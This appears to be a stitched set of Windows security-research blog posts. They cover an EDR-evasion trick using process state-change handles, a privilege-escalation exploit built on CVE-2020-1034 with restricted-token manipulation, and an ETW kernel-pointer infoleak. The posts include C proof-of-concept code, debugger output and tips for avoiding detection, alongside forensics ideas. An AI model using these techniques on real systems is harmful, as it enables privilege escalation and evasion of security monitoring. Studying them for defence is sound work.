There is still a way to keep those same detections without following all of Microsoft’s recent code changes – even though this feature adds new system calls, the internal kernel mechanism invoked by them remains the same. And in Windows 10, this mechanism is using a feature whose sole purpose is to help security solutions gain more information about the system and get them away from relying on user-mode hooks – ETW tracing. And more specifically, the Thread Intelligence ETW channel that was added specifically for security purposes. That channel notifies about events that are often interesting to security products, such as virtual memory protection changes, virtual memory writes, driver loads, and, as you probably already guessed, suspending and resuming threads and processes. EDRs that register for these ETW events and use them as part of their detection will not miss any event due to the new state change APIs since these events will be received in either case. Those that don’t use them yet should probably open some Jira tickets that will be forgotten until this technique is found in the wild.

1 EDR Bypass + Windows Internals = 2 EDR Bypasses

However, this feature does create another interesting EDR bypass. As I mentioned, the suspended process or thread will automatically be resumed when the state change object gets destroyed. Normally, this would happen when the process that created the object either closes the only handle to it or exits – this automatically destroys all open handles held by the process. But an object only gets destroyed when all handles to it are closed and there are no more references to it. This means that if another process has an open handle to the state change object it won’t get destroyed when the process that created it exits, and the suspended process or thread won’t be resumed until the second process exits. This shouldn’t happen under normal circumstances, but if a process duplicates its handle to a state change object into another process, it can safely exit without resuming the suspended process or thread.

But why would a process want to do that?

The ETW events that report that a process is being suspended or resumed contain a process ID of the process that performed the action – this way the EDR that consumes the event can correlate different events together and attribute them to a potentially malicious process. In this case, the PID would be the ID of the process in whose context the action happened. So let’s say we create a process that suspends another process through a state change object, then duplicates the handle into a third process and exits. The process state change object doesn’t get destroyed et since there is still a running process with an open handle to it. Only when the other process exits, the duplicated handle gets closed and the suspended process gets resumed. But since the resume action happened in the context of the second process, which had nothing to do with the suspend action, that is the PID that will appear in the ETW event.

So, in this proposed scenario, a process will get suspended and later resumed, and ETW events will still be thrown for both actions. But these events will have happened in the context of 2 different processes so they will be difficult to link together, and it will be even more difficult to attribute the resume action to the first process without knowledge of this exact scenario. And we can be even smarter – a lot of security products ignore operations that are attributed to certain system processes. This makes sense, since those processes are not expected to be malicious but might have suspicious-looking activity, so it is easier to ignore them unless there is clear indication of code injection, to avoid false positives.

So we can even choose an innocent-looking Windows process to duplicate our handle into, to maximize the chances that the resume operation will be ignored completely. We just need to find a process that we can open a handle to and that will terminate at some point, to resume our suspended process.

Finally, Code!

In this PoC I simply create 2 notepad.exe processes. One will be suspended using a state change object, and the other will have the handle duplicated inside it. Then the PoC process exits but the suspended notepad remains suspended until the other notepad process is terminated:

#include <Windows.h>
#include <stdio.h>

EXTERN_C_START
NTSTATUS
NtCreateProcessStateChange (
    _Out_ PHANDLE StateChangeHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ PVOID ObjectAttributes,
    _In_ HANDLE ProcessHandle,
    _In_ ULONG Unknown
    );

NTSTATUS
NtChangeProcessState (
    _In_ HANDLE StateChangeHandle,
    _In_ HANDLE ProcessHandle,
    _In_ ULONG Action,
    _In_ PVOID ExtendedInformation,
    _In_ SIZE_T ExtendedInformationLength,
    _In_ ULONG64 Reserved
    );
EXTERN_C_END

int main ()
{
    HANDLE stateChangeHandle;
    PROCESS_INFORMATION procInfo;
    PROCESS_INFORMATION procInfo2;
    STARTUPINFOA startInfo;
    BOOL result;
    NTSTATUS status;

    stateChangeHandle = nullptr;

    ZeroMemory(&startInfo, sizeof(startInfo));
    startInfo.cb = sizeof(startInfo);
    result = CreateProcess(L"C:\\Windows\\System32\\notepad.exe",
                           NULL,
                           NULL,
                           NULL,
                           FALSE,
                           0,
                           NULL,
                           NULL,
                           &startInfo,
                           &procInfo);
    if (result == FALSE)
    {
        goto Exit;
    }
    CloseHandle(procInfo.hThread);
    result = CreateProcess(L"C:\\Windows\\System32\\notepad.exe",
                           NULL,
                           NULL,
                           NULL,
                           FALSE,
                           0,
                           NULL,
                           NULL,
                           &startInfo,
                           &procInfo2);
    if (result == FALSE)
    {
        goto Exit;
    }
    CloseHandle(procInfo2.hThread);

    status = NtCreateProcessStateChange(&stateChangeHandle,
                                        MAXIMUM_ALLOWED,
                                        NULL,
                                        procInfo.hProcess,
                                        0);
    if (!NT_SUCCESS(status))
    {
        printf("Failed creating process state change. Status: 0x%x\n", status);
        goto Exit;
    }
    //
    // Action == 0 means Suspend
    //
    status = NtChangeProcessState(stateChangeHandle,
                                  procInfo.hProcess,
                                  ProcessStateChangeSuspend,
                                  NULL,
                                  0,
                                  0);
    if (!NT_SUCCESS(status))
    {
        printf("Failed changing process state. Status: 0x%x\n", status);
        goto Exit;
    }

    result = DuplicateHandle(GetCurrentProcess(),
                             stateChangeHandle,
                             procInfo2.hProcess,
                             NULL,
                             NULL,
                             TRUE,
                             DUPLICATE_SAME_ACCESS);
    if (result == FALSE)
    {
        printf("Failed duplicating handle: 0x%x\n", GetLastError());
        goto Exit;
    }

Exit:
    if (procInfo.hProcess != NULL)
    {
        CloseHandle(procInfo.hProcess);
    }
    if (procInfo2.hProcess != NULL)
    {
        CloseHandle(procInfo2.hProcess);
    }
    if (stateChangeHandle != NULL)
    {
        CloseHandle(stateChangeHandle);
    }
    return 0;
}

Like a lot of other cases, this feature started out as a well-intentioned attempt to solve a minor system issue. But an over-engineered design led to multiple security concerns and whole new EDR evasion techniques which turned the relatively small issue into a much larger one.

Exploiting a “Simple” Vulnerability, Part 2 – What If We Made Exploitation Harder?

Introduction

In a previous post I went over vulnerability CVE-2020-1034, which allows arbitrary increment of an address, and saw how we can use some knowledge of ETW internals to exploit it, give our process SeDebugPrivilege and create an elevated process. In this post I will develop this exercise and make things harder by adding some restrictions and difficulties to  see how we can bypass those and still get our wanted result – privilege escalation from a low or medium IL process to a system-level one.

New Limitations

The exploit I wrote in part one works just fine, but let’s imagine there is ever a new limitation in the kernel that doesn’t let us increment Token.Privileges.Enabled directly, for example making it a read-only field except for specific kernel code that is meant to modify it.

So, how can we enable a privilege without incrementing the address ourselves?

Enabling Privileges

The answer to that question is pretty simple – we enable them just like a process can enable any other privileges that it owns but are disabled – through RtlAdjustPrivilege, or it’s advapi32 wrapper – AdjustTokenPrivileges. But here we face a problem: When we try calling RtlAdjustPrivilege to enable our newly-added SeDebugPrivilege, we get back STATUS_PRIVILEGE_NOT_HELD.

To understand why this is happening we’ll have to take a look inside the very ugly and not very readable kernel functions that are in charge of enabling privileges in a token. To try and enable a privilege RtlAdjustPrivilege uses the system call NtAdjustPrivilegesToken, which calls the function SepAdjustPrivileges. This function first checks if a process is running with high, medium or low integrity level. If it has high IL, it can enable any privilege that it owns. However if it’s running with medium IL, we reach the following check:

Each requested privilege is checked against this constant value, representing the privileges that medium IL processes are not allowed to have. The value of SeDebugPrivilege is 0x100000 (1 << 20), and we can see it’s one of the denied options so it cannot be enabled for processes that aren’t running with high integrity level, at least. If we choose to run our process as low IL or in an AppContainer, those have similar checks with even more restrictive values. As usual, the easy options failed early. However, there are always ways around those problems, we just need to look a bit deeper into the operating system to find them.

Fake EoP Leading to Real EoP

We need to have a high or System-IL process to enable debug privilege, but we were planning to use our new debug privilege to elevate ourselves (or our child process, to be exact) to System… So, we’re stuck, right?

Wrong. We don’t actually need a high or system-IL process, just a high or system-IL token. A process doesn’t always have to use the token it was created with. Threads can impersonate any token they have a handle to, including ones with higher integrity levels. Still, to do that we will need a handle to a process with higher IL than us, in order to duplicate its token and impersonate it. And to open a handle to such a process we’ll need to already have some privilege we don’t have, like debug privilege… and we’re stuck in a loop.

But as I learned from the many lawyers in my family (we are a good Jewish family after all, and no one wanted to be a doctor so we had to compensate) – every loop has a loophole, and this one is no different. We don’t need a handle to the token of a different process if we can cheat and create a token that matches the requirements ourselves!

To understand how that is possible we need to learn a bit about the Windows security model and how integrity levels work. To convince you to get through another 500 words of internals information I’ll tell you that Alex and I showed this idea to James Forshaw and he thought it was cool. And if he thinks it’s cool that should be a good enough reason for you to read through my rants until I finally circle back to the actual idea. And now to some internals stuff:

Tokens, Integrity Levels and Why an Unprotected Array is an Exploiter’s Best Friend

To check the integrity level of a token we need to look at a field named IntegrityLevelIndex inside the TOKEN structure. We can dump it for our process and see what it contains:

dx ((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->IntegrityLevelIndex
((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->IntegrityLevelIndex : 0xe [Type: unsigned long]

Like the name suggests, this value on its own doesn’t tell us much because it’s only an index inside an array of SID_AND_ATTRIBUTES structures, pointed to by the UserAndGroups field. We can verify this by looking at SepLocateTokenIntegrity, which is called by SepAdjustPrivileges to determine the integrity level of the token whose privileges it’s adjusting:

This array has multiple entries, the exact number of which changes between different processes. We can tell how many using the UserAndGroupCount field:

dx ((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroupCount
((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroupCount : 0xe [Type: unsigned long]
dx -g *((nt!_SID_AND_ATTRIBUTES(*)[0xe])((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroups)

This is cool and everything, but what does this actually mean and how does it help us fix our broken exploit?

Like the name suggests, a SID_AND_ATTRIBUTES structure contains a security descriptor (SID) and specific attributes for it. These attributes depend on the type of data we’re working with, in this case we can find the meaning of these attributes here. The security identifier part of the structure is the one telling us which user and groups this token belongs to. This piece of information determines what integrity level the token has and what it can and cannot do on the system. For example, only some groups can have access to certain processes and files, and in the previous blog post we learned that most GUIDs only allow certain groups to register them. SIDs have the format of S-1-X-…, which makes them easy to identify.

We can improve our WinDbg query to show all the groups that our token is a part of in a convenient format:

dx –s @$sidAndAttr = *((nt!_SID_AND_ATTRIBUTES(*)[0xf])((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroups)
dx -g @$sidAndAttr.Select(s => new {Attributes = s->Attributes, Sid = Debugger.Utility.Control.ExecuteCommand("!sid " + ((__int64)(s->Sid)).ToDisplayString("x"))[0].Remove(0, 8)})

The entry that our token is pointing to, at 0xe, is the last one in the table, and it’s the SID for medium integrity level, which is the reason we can’t enable our debug privilege. However, the design of this system gives us a way to bypass out integrity level issue. The UserAndGroups field points to the array, but the array itself is allocated immediately after the TOKEN structure. And this is not the last thing in this memory block. If we dump the TOKEN structure we can see that right after the UserAndGroups field there is another pointer to an array of the same format, called RestrictedSids:

[+0x098] UserAndGroups    : 0xffffad8914e1e4f0 [Type: _SID_AND_ATTRIBUTES *]    
[+0x0a0] RestrictedSids   : 0x0 [Type: _SID_AND_ATTRIBUTES *]

Restricted tokens are a way to limit the access that a certain process or thread will have by only allowing the token to access objects whose ACL specifically allows access to that SID. For example, if a token has a restricted SID for “Bob”, then the process or thread using this token can only access files if they explicitly allow access to “Bob”. Even if “Bob” is part of a group that is allowed to access the file (like Users or Everyone), it will be denied access unless the file “knows” in advance that “Bob” will try to access it and adds the SID to its ACL. This capability is sometimes used in services to restrict their access only to objects that are necessary for them to use and reduce the possible attack surface. Restricted tokens can also be used to remove default privileges from a token that doesn’t need them. For example, the BFE service uses a write restricted token. This means it can have read access to any object, but can only get write access to objects which explicitly allow its SID:

There are two important things to know about restricted tokens that make our elevation trick possible:

  1. The array of restricted SIDs is allocated immediately after the UserAndGroups array.

  2. It is possible to create a restricted token for any SID, including ones that the process doesn’t currently have.

These 2 facts mean that even as a low or medium IL process, we can create a restricted token for high IL SID and impersonate it. This will add a new SID_AND_ATTRIBUTES entry to the RestrictedSids array, immediately after the UserAndGroups array, in a way that can be looked at as the next entry in the UserAndGroups array. The current IntegrityLevelIndex points to the last entry in the UserAndGroups array, so one little increment of the index will make it point to the new high IL restricted token. How lucky are we to have an arbitrary increment vulnerability?

Lets try this out. We use CreateWellKnownSid to create a WinHighLabelSid, and then use CreateRestrictedToken to create a new restricted token with a high IL SID, then impersonate it:

HANDLE tokenHandle;
HANDLE newTokenHandle;
HANDLE newTokenHandle2;
PSID pSid;
PSID_AND_ATTRIBUTES sidAndAttributes;
DWORD sidLength = 0;
BOOL bRes;

//
// Call CreateWellKnownSid once to check the needed size for the buffer
//

CreateWellKnownSid(WinHighLabelSid, NULL, NULL, &sidLength);

//
// Allocate a buffer and create a high IL SID
//

pSid = malloc(sidLength);
CreateWellKnownSid(WinHighLabelSid, NULL, pSid, &sidLength);

//
// Create a restricted token and impersonate it
//

sidAndAttributes = (PSID_AND_ATTRIBUTES)malloc(0x20);
sidAndAttributes->Sid = pSid;
sidAndAttributes->Attributes = 0;

bRes = OpenProcessToken(GetCurrentProcess(),
                        TOKEN_ALL_ACCESS,
                        &tokenHandle);

if (bRes == FALSE)
{
    printf("OpenProcessToken failed\n");
    return 0;
}

bRes = CreateRestrictedToken(tokenHandle,
                             WRITE_RESTRICTED,
                             0,
                             NULL,
                             0,
                             NULL,
                             1,
                             sidAndAttributes,
                             &newTokenHandle2);

if (bRes == FALSE)
{
    printf("CreateRestrictedToken failed\n");
    return 0;
}

bRes = ImpersonateLoggedOnUser(newTokenHandle2);
if (bRes == FALSE)
{
    printf("Impersonation failed\n");
    return 0;
}

Now lets look at our thread token and its groups. Notice that we are impersonating this new token, so we need to check the impersonation token of our thread, as our primary process token is not affected by any of this:

dx -s @$token = ((nt!_TOKEN*)(@$curthread.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))

dx new {GroupsCount = @$token->UserAndGroupCount, UserAndGroups = @$token->UserAndGroups, RestrictedCount = @$token->RestrictedSidCount, RestrictedSids = @$token->RestrictedSids, IntegrityLevelIndex = @$token->IntegrityLevelIndex}
new {GroupsCount = @$token->UserAndGroupCount, UserAndGroups = @$token->UserAndGroups, RestrictedCount = @$token->RestrictedSidCount, RestrictedSids = @$token->RestrictedSids, IntegrityLevelIndex = @$token->IntegrityLevelIndex}

GroupsCount      : 0xf [Type: unsigned long]
UserAndGroups    : 0xffffad890d5ffe00 [Type: _SID_AND_ATTRIBUTES *]
RestrictedCount  : 0x1 [Type: unsigned long]
RestrictedSids   : 0xffffad890d5ffef0 [Type: _SID_AND_ATTRIBUTES *]
IntegrityLevelIndex : 0xe [Type: unsigned long]

UserAndGroups still has 0xf entries and our IntegrityLevelIndex is still 0xe, like in the primary token. But now we have a restricted SID! I mentioned earlier that because of the memory layout we can treat this restricted SID like an additional entry in the UserAndGroups array, lets test that. We’ll try to dump the array the same way we did before, but pretend it has 0x10 entries:

dx -s @$sidAndAttr = *((nt!_SID_AND_ATTRIBUTES(*)[0x10])@$token->UserAndGroups)
dx -g @$sidAndAttr.Select(s => new {Attributes = s->Attributes, Sid = Debugger.Utility.Control.ExecuteCommand("!sid " + ((__int64)(s->Sid)).ToDisplayString("x"))[0].Remove(0, 8)})

And it works! It looks as if there are now 0x10 valid entries, and the last one has a high IL SID, just like we wanted.

Now we can run our exploit like we did before, with two small changes:

  1. All changes need to use our current thread token instead of the primary process token.

  2. We need to trigger the exploit twice – once to increment Privileges.Present to add SeDebugPrivilege and another time to increment IntegrityLevelIndex to point to entry 0xf.

Nothing ever validates that the IntegrityLevelIndex is lower than UserAndGroupCount (and if something did, we could use the same vulnerability to increment it as well). So, when our new impersonation token points to a high IL SID, SepAdjustPrivileges thinks that it is running as a high IL process and lets us enable whichever privilege we want. After making the changes to the exploit we can run it again and see that RtlAdjustPrivileges returns STATUS_SUCCESS this time. But I never fully believe the API and want to check for myself:

Or if you prefer WinDbg:

dx -s @$t0 = ((nt!_TOKEN*)(@$curthread.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))

1: kd> !token @$t0 -n
_TOKEN 0xffffad89168c4970
TS Session ID: 0x1
User: S-1-5-21-2929524040-830648464-3312184485-1000 (User:DESKTOP-3USPPSB\yshafir)
User Groups:
...
Privs:
19 0x000000013 SeShutdownPrivilege               Attributes -
20 0x000000014 SeDebugPrivilege                  Attributes - Enabled
23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default
25 0x000000019 SeUndockPrivilege                 Attributes -
33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes -
34 0x000000022 SeTimeZonePrivilege               Attributes -
Authentication ID:         (0,2a084)
Impersonation Level:       Impersonation
TokenType:                 Impersonation
...
RestrictedSidCount: 1      
RestrictedSids: 0xffffad89168c4ef0
Restricted SIDs:
00 S-1-16-12288 (Label: Mandatory Label\High Mandatory Level)
Attributes - Mandatory Default Enabled
…

Our impersonation token has SeDebugPrivilege, just like we wanted. Now we can do what we did last time and run an elevated cmd.exe under the DcomLaunch service. You might wonder if we really need to do that, now that we have a high IL token. But restricted tokens are still not really regular tokens, and we will probably face some issues if we try to run as a fake elevated process using a restricted token. It might also look a little suspicious to anyone who might be scanning our process, so it’s best to create a new process that can run as SYSTEM without any tricks.

Forensics

This trick we’re using is pretty cool, not only because it lets us cheat the system but also because it’s pretty hard to detect. The biggest tell for anyone looking for it would be that the IntegrityLevelIndex is outside the bounds of the UserAndGroups array, but even if someone looking at that it’s easy enough to trigger the vulnerability one more time to increment UserAndGroupCount as well. This is still detectable if you calculate the end address of the UserAndGroups array based on the count and compare it with the start address of the RestrictedSids array, seeing that they don’t match. But this is super specific detection that is probably a bit too much for a very uncommon technique.

A second way to find this is to search for threads impersonating restricted tokens. This is pretty uncommon and when I run this query the only process that comes up is my exploit:

dx @$cursession.Processes.Where(p => p.Threads.Where(t => t.KernelObject.ActiveImpersonationInfo != 0 && ((nt!_TOKEN*)(t.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))->RestrictedSidCount != 0).Count() != 0)
@$cursession.Processes.Where(p => p.Threads.Where(t => t.KernelObject.ActiveImpersonationInfo != 0 && ((nt!_TOKEN*)(t.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))->RestrictedSidCount != 0).Count() != 0)
[0x279c]         : exploit_part_2.exe [Switch To]

But this is a very targeted search, that will only find this very specific case. And anyway it’s easy enough to avoid by making the thread revert back to its original token after the privilege is enabled. This is generally a good practice – don’t let your exploit keep “suspicious” attributes for longer than necessary to minimize possible detections. However, all the forensic ideas I mentioned in the previous blog post still work in this case – we’re using the same vulnerability and triggering it the same way, so we still register a new ETW provider that no one else uses and leaving occupied slots that can never be emptied without crashing the system. So if you know what to look for, this is a pretty decent way to find it.

And of course, there is the fact that a Medium IL process suddenly managed to grab SeDebugPrivilege, open a handle to DcomLaunch and create a new reparented, elevated process. That would (hopefully) raise some flags for a couple of EDR products.

Conclusion

This post described a hypothetical scenario where we can’t simply increment Privileges.Enabled in our process token. We currently don’t need all these fancy tricks, but they are very cool to find and exploit, sort of like a DIY CTF, and maybe one day they will turn out to be useful in another context. These tricks clearly show that the token contains lots of interesting fields that can be used in various ways, and how a single increment and some internals knowledge can take you a long way.

Since the token is this vulnerable and doesn’t tend to change very often, maybe it’s time to protect it better, for example by moving it to the Secure Pool?

In this post and the previous one I ended up grabbing SeDebugPrivilege and using a reparenting trick to create a new elevated process. In a future post that might happen one day, I will look at some other privileges that are mostly ignored in the exploitation field and can be used in new and unexpected ways.


The full PoC for this technique can be found here.

Read our other blog posts:

Exploiting a “Simple” Vulnerability – Part 1.5 – The Info Leak

Introduction

This post is not actually directly related to the first one and does not use CVE-2020-1034. It just talks about a second vulnerability that I found while researching ETW internals, which discloses the approximate location of the NonPaged pool to (almost) any user. It was spurred by a tweet that challenged me to find an information leak. It turns out I found one that wasn’t actually patched after all!

The vulnerability itself is not especially interesting, but the process of finding and understanding it was fun so I wanted to write about that. Also, when I reported it Microsoft marked it as “Important” but would not pay anything for it and eventually marked it as “won’t fix” even though fixing this issue takes less time than writing an email, so the annoyance factor alone makes writing this post worth it. And this is a chance to rant about some more ETW internals stuff which didn’t really fit into any of the other posts, so you can read them or skip right to the PoC, your choice.

Update

This vulnerability was eventually acknowledged by Microsoft and received CVE-24107. It was fixed on 9/3/2021.

More ETW Internals!

Remember that the first thing you learn about ETW notifications are that they are asynchronous? Well, that was a lie. Sort of. Most ETW notifications really are asynchronous. However, in the previous blog post we used a vulnerability that relied on improper handling of the ReplyRequested field in the ETWP_NOTIFICATION_HEADER structure. The existence of this field implies that you can reply to an ETW event. But no one ever told you that you can reply to an ETW notification, how would that even work?

Normally, ETW works just the way you were told. That is the case for all Windows providers, and any other ETW provider I could find. But there is a “secret setting” that happens when someone notifies an ETW provider with ReplyRequested = 1. Then, as we saw in the previous blog post, the notification gets added to a reply queue and is waiting for a reply. Remember, there can only be 4 queues notifications waiting for a reply at any moment. When that happens, any process which registered for that provider has its registered callback notified and has a chance to reply to the notification using EtwReplyNotification. When someone replies to the notification, the original notification gets removed from the queue and the reply notification gets added to the reply queue.

The only case I could see so far where a reply is sent to a notification is immediately after a GUID is enabled – sechost!EnableTraceEx2 (which is the standard way of registering a provider and enabling a trace) has a call to ntdll!EtwSendNotification with EnableNotificationPacket->DataBlockHeader.ReplyRequested set to 1. That creates an EtwRegistration object, so before returning to Sechost, Ntdll immediately replies to the notification with NotificationHeader->NotificationType set to EtwNotificationTypeNoReply, simply to get it removed from the notification queue.

Specifically, in this case, something a little more complicated happens. Even though Ntdll is enabling the GUID, it’s not the “owner” of the registration instance and therefore doesn’t have a registered callback (since this belongs to whoever registered the provider). Yet Ntdll still needs to know when the kernel enables the provider, to queue the reply notification – it can’t expect the caller to know that this needs to be done. So to do this, it uses a trick.

When EtwRegisterProvider is called, it calls EtwpRegisterProvider. The first time this function is called, it calls EtwpRegisterTpNotificationOnce:

Without getting into too many internal details about waits and the thread pool, this function essentially creates an event with the callback function EtwpNotificationThread and then calls NtTraceControl with an Operation value of 27 – an undocumented and unknown value. Looking at the kernel side of things, it’s not too hard to give this value a name:

I’ll call this operation EtwAddNotificationEvent.

EtwpAddNotificationEvent is a pretty simple function: it receives an event handle, grabs the event object, and sets EventDataSource->NotificationEvent in the EPROCESS of the current process to the event (or NotificationEventWow64, if this is a WoW64 process). Since this field is a pointer and not a list, it can only contain one event at a time. If this field is not set to 0, the value won’t be set and the caller will receive STATUS_ALREADY_REGISTERED as a response status.

Then, in EtwpQueueNotification, immediately after a notification is added to the notification queue for the process, this event is signaled:

The event being signaled makes the EtwpNotificationCallback get called, since it was registered to wait on this event, so it is, in a way, an ETW notification callback that is being notified whenever the process receives an ETW notification. However, this function is not a real ETW notification callback, so it doesn’t receive the notification as any of its parameters and has to somehow get it by itself in order to reply to it. Luckily, it has a way to do that.

The first thing that EtwpNotificationThread does is make another call to NtTraceEvent, this time with operation number 16EtwReceiveNotification. This operation leads to a call to EtwpReceiveNotification, which chooses the first queued notification for the process (and matching the process’ WoW64 status) and returns it. This operation requires no input arguments – it simply returns the first queued notification. This gives EtwpNotificationThread all the information that it needs to reply to that last queued notification quietly, without disturbing the unaware caller that simply asked it to register a provider. After replying, the event is set to a waiting state again, to wait for the next notification to arrive.

Most of this pretty long explanation has nothing to do with this vulnerability, which really is pretty small and simple and can be explained in a much less complicated way. But I did say this post was mostly an excuse to dump some more obscure ETW knowledge in hope that one day someone other than me will read it and find it helpful, so you all knew what you were getting into.

And now that we have all this unnecessary background, we can look at the vulnerability itself.

The InfoLeak

The issue is actually in the last part we talked about – returning the last queued notification. If you remember from the last post, when a GUID is notified and the notification header has ReplyRequested == 1, this leads to the creation of a kernel object which will be placed in the ReplyObject field of the notification that is later put in the notification queue. And this is the same structure that can be retrieved using NtTraceControl with EtwReceiveNotification operation… Does that mean that we get a free kernel pointer by calling NtTraceControl with the right arguments?

Not exactly. To be precise, you get half of a kernel pointer. Microsoft didn’t completely ignore the fact that retuning kernel pointers to user-mode callers is a bad idea, like they did in so many other cases. The ReplyObject field in ETWP_NOTIFICATION_HEADER is in a union with ReplyHandle and RegIndex. And after copying the data to the user-mode buffer, they set the value of RegIndex, which should overwrite the kernel pointer that is in the same union:

The only thing that this code doesn’t account for is the fact that ReplyObject and RegIndex don’t have the same type: ReplyObejct is a pointer (8 bytes on x64) while RegIndex is a ULONG (4 bytes on x64). So setting RegIndex only removes the bottom half of the pointer, leaving the top half to be returned to the caller:

Triggering this is extremely simple and includes exactly three steps:

  1. Register a provider
  2. Queue a notification where ReplyObject is a kernel object – do this by calling NtTraceControl with operation == EtwSendDataBlock and ReplyRequested == TRUE in the notification header.
  3. Call NtTraceControl with operation == EtwReceiveNotification and get your half of a kernel pointer.

It’s true that the top half of a kernel address is not all that much, but it can still give a caller a better guess of where the NonPagedPool (where those objects are allocated) is found. In fact, since the NonPagedPool is sized 16TB (or 0x100000000000 bytes), this vulnerability tells us exactly where the NonPaged pool is, and we can validate that in the debugger:

!vm 21
...
System Region               Base Address    NumberOfBytes
SecureNonPagedPool    : ffff838000000000       8000000000
KernelShadowStacks    : ffff888000000000       8000000000
PagedPool             : ffff8a0000000000     100000000000
NonPagedPool          : ffff9d0000000000     100000000000
SystemCache           : ffffb00000000000     100000000000
SystemPtes            : ffffc40000000000     100000000000
UltraZero             : ffffd40000000000     100000000000
Session               : ffffe40000000000       8000000000
PfnDatabase           : ffffe78000000000      c8000000000
PageTables            : fffff40000000000       8000000000
SystemImages          : fffff80000000000       8000000000
Cfg                   : fffffaf0ea2331d0      28000000000
HyperSpace            : fffffd0000000000      10000000000
KernelStacks          : fffffe0000000000      10000000000

This can be triggered from almost any user, including Low IL and AppContainer, where most of the classic infoleaks don’t work anymore, this might be of some use, even if a limited one.

I believe that when this code was introduced, it was completely safe – those areas of the code are pretty ancient and get very few changes. This code was probably introduced in the days before x64, when the size of a pointer and the size of a ULONG was the same, so setting RegIndex did overwrite the whole object address. When x64 changed the size of a pointer, this code was left behind and was never updated to match this, so this bug appeared.

This makes you wonder what similar bugs might exist in other pieces of ancient code that even Microsoft forgot about?

Just Show Me the Code Already!

In case you want to see the three lines of code that trigger this bug, you can find them here.